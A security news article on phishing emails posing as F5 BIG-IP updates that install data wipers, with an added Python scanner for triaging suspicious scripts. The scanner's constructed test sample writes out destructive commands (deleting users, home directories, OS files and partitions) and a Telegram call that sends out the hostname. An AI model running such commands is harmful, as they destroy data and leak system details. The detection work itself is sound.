Thursday, December 21, 2023

Fake F5 BIG-IP zero-day warning emails push data wipers


The Israel National Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day security updates that deploy Windows and Linux data wipers.

Israel's National Cyber Directorate (INCD) acts as the CERT responsible for protecting the country from cyber threats and for warning organizations and citizens about known attacks.

Since October, Israel has been heavily targeted by pro-Palestinian and Iranian hacktivists, who have been conducting data theft and data-wiping attacks on organizations in the country.

In November, a new data wiper called BiBi Wiper was discovered that targeted both Linux and Windows devices and is believed to have been created by pro-Hamas hacktivists.

Fake F5 update deploys wiper

Yesterday, INCD warned of a new phishing attack deploying data wipers through emails pretending to be a warning about a zero-day vulnerability in F5 BIG-IP devices.

A pro-Palestinian hacktivist group named Handala told BleepingComputer that they were responsible for the phishing attack, stating it was deployed on numerous Israeli networks. BleepingComputer has not been able to verify these claims independently.

The phishing email warns that the F5 BIG-IP zero-day vulnerability is actively exploited in attacks, urging Israeli organizations to download and install a security update before their network is breached.

Phishing email pushing fake F5 BIG-IP update
Source: INCD

For Windows users, the email pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named update.sh [VirusTotal].

When launched, both the Windows and Linux versions attempt to impersonate an F5 security update by displaying the company's logo on the screen.

For example, the Windows wiper will display a small screen branded with the F5 logo that pretends to be a security update installer.

Windows data wiper impersonating F5 security update
Source: BleepingComputer

When the Update button is clicked, the wiper will send a message containing information about the system to a Telegram channel and attempt to wipe all the data from the computer.

However, in BleepingComputer's tests, the wiper is a bit buggy, not deleting all the files on a computer.

The Linux wiper is a shell script that first downloads the packages necessary to wipe the computer, which are xfsprogs, wipe, and parted.

Linux wiper's data wiping routine
Source: BleepingComputer

These packages are used first to remove all users on the system and then to run the 'wipe' command to delete the associated home directories.

The wiper will then attempt to delete all operating system files and the partitions on the Linux system. When done, the Linux computer is rebooted so that the partition changes take effect.

Like the Windows wiper, the Linux version will communicate with a Telegram channel to provide information about the system and status updates.
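The sequence described above (pulling in xfsprogs, wipe and parted, removing users, wiping home directories, deleting OS files and partitions, reporting to Telegram, then rebooting) is a useful pattern for triaging a suspicious shell script before anyone runs it. The following Python scanner is an added example written for this article; it is not code from INCD, BleepingComputer or the wiper itself. The indicator regexes, the scoring thresholds and both sample scripts are assumptions constructed for illustration, with placeholders (`<TOKEN>`, `/dev/DISK`) standing in for any real values.

```python
import re
from typing import Dict, List

# Heuristics for the behaviour the article attributes to the Linux wiper script:
# fetching xfsprogs/wipe/parted, removing users, wiping home directories,
# deleting OS files and partitions, reporting to Telegram, then rebooting.
# These patterns are constructed for this example, not taken from the sample.
INDICATORS: Dict[str, re.Pattern] = {
    "installs_wipe_tooling": re.compile(r"\b(apt(-get)?|yum|dnf)\s+install\b.*\b(wipe|parted|xfsprogs)\b"),
    "removes_users": re.compile(r"\buserdel\b"),
    "wipes_home": re.compile(r"\bwipe\b.*\s/home\b"),
    "deletes_os_files": re.compile(r"\brm\s+-\w*r\w*\s+(--no-preserve-root\s+)?/(etc|usr|boot|bin|lib|\s|$)"),
    "deletes_partitions": re.compile(r"\bparted\b.*\b(rm|mklabel)\b"),
    "reports_to_telegram": re.compile(r"api\.telegram\.org/bot"),
    "forces_reboot": re.compile(r"^\s*(reboot|shutdown\s+-r)\b"),
}


def scan_script(text: str) -> dict:
    """Scan a shell script line by line; report which indicators fired and where."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines, comments and the shebang
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    count = len(hits)
    if count >= 4:
        verdict = "likely wiper"
    elif count >= 1:
        verdict = "needs review"
    else:
        verdict = "no wiper indicators"
    return {"indicators": sorted(hits), "hits": hits, "verdict": verdict}


# Constructed sample mirroring the step order described in the article.
# Device name and bot token are placeholders; this is not the real update.sh.
SUSPECT_SCRIPT = """#!/bin/bash
# constructed sample for the scanner, not a real file
apt-get install -y xfsprogs wipe parted
curl -s "https://api.telegram.org/bot<TOKEN>/sendMessage" -d "text=$(hostname)"
for u in $(ls /home); do userdel -r "$u"; done
wipe -rf /home
rm -rf /etc /boot
parted /dev/DISK rm 1
reboot
"""

# Constructed benign maintenance script, to show the scanner stays quiet on it.
BENIGN_SCRIPT = """#!/bin/sh
set -e
apt-get update
apt-get install -y openssl ca-certificates
systemctl restart nginx
"""

if __name__ == "__main__":
    for label, script in (("suspect", SUSPECT_SCRIPT), ("benign", BENIGN_SCRIPT)):
        result = scan_script(script)
        print(f"{label}: {result['verdict']} {result['hits']}")
```

The scanner keys on command names rather than arguments, so renamed paths or devices do not evade it, and it reports line numbers so an analyst can jump straight to the destructive steps. A single hit (a legitimate script that happens to install xfsprogs) only yields "needs review"; the "likely wiper" verdict requires several of the chained behaviours together.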

Data wipers have become a huge problem for Israel, with hacktivists commonly using them in destructive attacks to disrupt Israel's operations and economy.

As always, the best defense is to download files from email only if they come from a trusted and verified source. Furthermore, security updates should only be downloaded directly from the hardware vendor, not from third-party sites.
